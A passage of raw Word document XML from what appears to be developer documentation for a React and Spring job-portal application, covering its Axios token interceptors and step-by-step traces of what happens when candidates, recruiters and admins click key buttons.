            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      {children}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;/AuthContext.Provider&gt;</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Network Client &amp; Axios Interceptors: api.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interceptor Pipeline: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>All outgoing REST calls pass through a customized Axios instance configured in src/services/api.js. Two interceptors guarantee automated security token injection and automatic logout on session expiration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Request Interceptor: Runs before every outgoing HTTP call. It reads the JWT token from localStorage. If present, it injects the 'Authorization: Bearer &lt;token&gt;' header automatically. Developers never need to manually attach tokens in individual API methods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Response Interceptor: Runs whenever the backend responds. If the server returns HTTP 401 Unauthorized (e.g., token expired or revoked), the interceptor purges localStorage and forces a client-side redirect to '/login', preventing broken UI states.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: api.js - Automated Axios Request &amp; Response Interceptors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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// In services/api.js:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>const api = axios.create({</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  baseURL: 'http://localhost:8080/api',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  headers: { 'Content-Type': 'application/json' }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>});</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 Request Interceptor: Injects Bearer Token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>api.interceptors.request.use((config) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  const token = localStorage.getItem('token');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (token) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    config.headers.Authorization = `Bearer ${token}`;</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 xml:space="preserve">  return config;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>}, (error) =&gt; Promise.reject(error));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// Response Interceptor: Handles Expired Sessions</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>api.interceptors.response.use(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  (response) =&gt; response,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  (error) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (error.response &amp;&amp; error.response.status === 401) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      localStorage.clear();</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      window.location.href = '/login';</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 xml:space="preserve">    return Promise.reject(error);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>'If I Click This Button, What Happens?' (20+ End-to-End Execution Traces)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>This section traces the complete end-to-end execution flow triggered when a user interacts with primary UI controls. Every trace maps the click event from the React DOM through Axios, Spring Security, Controllers, Services, JPA, and Database tables:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Candidate: 1-Click 'Apply for Job' Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobDetailsPage.jsx -&gt; handleApplyClick()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. User clicks 'Apply Now' on JobDetailsPage.</w:t>
        <w:br/>
        <w:t>2. handleApplyClick() opens confirmation modal, reading cover letter text.</w:t>
        <w:br/>
        <w:t>3. Dispatches applicationApi.applyForJob(jobId, { coverLetter }).</w:t>
        <w:br/>
        <w:t>4. Axios request interceptor attaches 'Authorization: Bearer &lt;token&gt;'.</w:t>
        <w:br/>
        <w:t>5. HTTP POST /api/jobs/{id}/apply reaches Spring Security Filter Chain.</w:t>
        <w:br/>
        <w:t>6. JwtAuthenticationFilter verifies HMAC-SHA256 signature, loading Candidate identity into SecurityContextHolder.</w:t>
        <w:br/>
        <w:t>7. ApplicationController.applyForJob(jobId, candidate, dto) invokes ApplicationService.applyForJob().</w:t>
        <w:br/>
        <w:t>8. ApplicationService executes within @Transactional boundary:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - Checks applicationRepo.existsByJobAndCandidate(job, candidate).</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - If exists -&gt; throws DuplicateApplicationException (returns 409 Conflict).</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - If not -&gt; builds Application entity (status = APPLIED, appliedAt = now).</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - Saves to applications table via ApplicationRepository.</w:t>
        <w:br/>
        <w:t xml:space="preserve">   - Calls NotificationService.createNotification() inserting into notifications table.</w:t>
        <w:br/>
        <w:t>9. Database commits transaction; returns 201 Created with ApplicationDto.</w:t>
        <w:br/>
        <w:t>10. Axios receives 201; React updates local state: setIsApplied(true); UI renders green 'Applied' badge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Candidate: Quick Sign In Demo Account Pill</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>LoginPage.jsx -&gt; handleDemoFill('candidate')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. User clicks 'Candidate' demo pill on LoginPage.</w:t>
        <w:br/>
        <w:t>2. handleDemoFill() populates form state: { username: 'riya.backend', password: 'Password@123' }.</w:t>
        <w:br/>
        <w:t>3. User clicks 'Sign In'; form onSubmit triggers handleSubmit().</w:t>
        <w:br/>
        <w:t>4. Calls authService.login(credentials) -&gt; POST /api/auth/login.</w:t>
        <w:br/>
        <w:t>5. AuthController delegates to AuthService.login().</w:t>
        <w:br/>
        <w:t>6. AuthenticationManager verifies credentials against BCrypt hash in users table.</w:t>
        <w:br/>
        <w:t>7. JwtUtil.generateToken() creates signed JWT containing username and ROLE_CANDIDATE.</w:t>
        <w:br/>
        <w:t>8. Server returns 200 OK: { token: 'eyJ...', user: { username, roles } }.</w:t>
        <w:br/>
        <w:t>9. LoginPage calls auth.login(data.user, data.token), updating AuthContext and localStorage.</w:t>
        <w:br/>
        <w:t>10. React Router navigates user to /candidate/dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Recruiter: 'Advance Candidate to Shortlisted' Dropdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicantTrackingPage.jsx -&gt; handleStageChange(applicationId, 'SHORTLISTED')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Recruiter selects 'SHORTLISTED' from stage dropdown on candidate card.</w:t>
        <w:br/>
        <w:t>2. Triggers recruiterApi.updateApplicationStatus(applicationId, 'SHORTLISTED').</w:t>
        <w:br/>
        <w:t>3. HTTP PUT /api/recruiter/applications/{id}/status sent with Bearer token.</w:t>
        <w:br/>
        <w:t>4. JwtAuthenticationFilter authenticates user; verifies ROLE_RECRUITER authority.</w:t>
        <w:br/>
        <w:t>5. RecruiterController delegates to ApplicationService.updateStatus().</w:t>
        <w:br/>
        <w:t>6. ApplicationService loads Application entity; validates state transition; sets status = SHORTLISTED.</w:t>
        <w:br/>
        <w:t>7. Calls AuditLogService.logAction('STAGE_CHANGE', recruiterUsername, clientIp).</w:t>
        <w:br/>
        <w:t>8. NotificationService creates alert: 'Your application was shortlisted!'.</w:t>
        <w:br/>
        <w:t>9. Returns 200 OK with updated ApplicationDto.</w:t>
        <w:br/>
        <w:t>10. React updates applicants state array; candidate card transitions into 'Shortlisted' tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Recruiter: 'Schedule Google Meet Interview' Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ScheduleInterviewModal.jsx -&gt; handleScheduleSubmit()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Recruiter fills date, time, round ('Technical Round 1'), and Google Meet URL; clicks 'Confirm Schedule'.</w:t>
        <w:br/>
        <w:t>2. Dispatches interviewApi.scheduleInterview(dto) -&gt; POST /api/interviews/schedule.</w:t>
        <w:br/>
        <w:t>3. InterviewController validates DTO via @Valid; delegates to InterviewService.</w:t>
        <w:br/>
        <w:t>4. InterviewService creates Interview entity mapped to Application and Recruiter.</w:t>
        <w:br/>
        <w:t>5. Application status automatically updates to INTERVIEW_SCHEDULED.</w:t>
        <w:br/>
        <w:t>6. Notification dispatched to candidate with interview time and Google Meet link.</w:t>
        <w:br/>
        <w:t>7. Returns 201 Created with InterviewDto.</w:t>
        <w:br/>
        <w:t>8. Modal closes; React UI renders blue 'Interview Scheduled' badge with Meet URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Recruiter: 'Generate Binding Job Offer' Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>OfferGenerationModal.jsx -&gt; handleOfferSubmit()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Recruiter inputs base salary (e.g., ₹24,00,000), joining date, and terms; clicks 'Send Offer'.</w:t>
        <w:br/>
        <w:t>2. Dispatches offerApi.createOffer(dto) -&gt; POST /api/offers.</w:t>
        <w:br/>
        <w:t>3. OfferController invokes OfferService.createOffer().</w:t>
        <w:br/>
        <w:t>4. OfferService validates candidate is in SELECTED stage; creates Offer record with status EXTENDED.</w:t>
        <w:br/>
        <w:t>5. Application status updates to OFFER_SENT.</w:t>
        <w:br/>
        <w:t>6. Candidate receives high-priority notification: 'Congratulations! You received an offer.'</w:t>
        <w:br/>
        <w:t>7. Returns 201 Created; UI updates candidate status to 'Offer Extended'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Candidate: 'Accept Job Offer' Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationsPage.jsx -&gt; handleOfferResponse(offerId, 'ACCEPTED')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Candidate clicks 'Accept Offer' on active offer banner.</w:t>
        <w:br/>
        <w:t>2. Dispatches offerApi.respondToOffer(offerId, { status: 'ACCEPTED' }) -&gt; PUT /api/offers/{id}/respond.</w:t>
        <w:br/>
        <w:t>3. OfferController invokes OfferService.respondToOffer().</w:t>
        <w:br/>
        <w:t>4. OfferService sets offer.status = ACCEPTED; updates application.status = HIRED.</w:t>
        <w:br/>
        <w:t>5. Audit log records formal candidate hiring event.</w:t>
        <w:br/>
        <w:t>6. Returns 200 OK; UI updates banner to green 'Offer Accepted! Welcome to the team.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Recruiter: 'Export Candidates (CSV)' Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicantTrackingPage.jsx -&gt; handleExportCsv()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Recruiter clicks 'Export Candidates (CSV)' button.</w:t>
        <w:br/>
        <w:t>2. Dispatches window.open('/api/recruiter/jobs/{id}/export-applicants') with Bearer token.</w:t>
        <w:br/>
        <w:t>3. RecruiterController queries all candidates for requisition.</w:t>
        <w:br/>
        <w:t>4. Formats data into CSV string (ID, Name, Email, Skills, MatchScore, Stage, AppliedAt).</w:t>
        <w:br/>
        <w:t>5. Sets HTTP response headers: Content-Type: text/csv, Content-Disposition: attachment; filename=candidates.csv.</w:t>
        <w:br/>
        <w:t>6. Browser downloads candidates.csv directly to the recruiter's local machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Admin: 'Suspend User Account' Moderation Button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger &amp; Handler: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AdminJobSeekerPage.jsx -&gt; handleToggleStatus(userId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">End-to-End Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Administrator clicks 'Suspend' button on user table row.</w:t>
        <w:br/>
        <w:t>2. Dispatches adminApi.toggleUserStatus(userId) -&gt; PUT /api/admin/users/{id}/toggle-status.</w:t>
        <w:br/>
        <w:t>3. AdminController verifies caller possesses ROLE_ADMIN authority.</w:t>
        <w:br/>
        <w:t>4. AdminService loads User entity; sets user.enabled = false.</w:t>
        <w:br/>
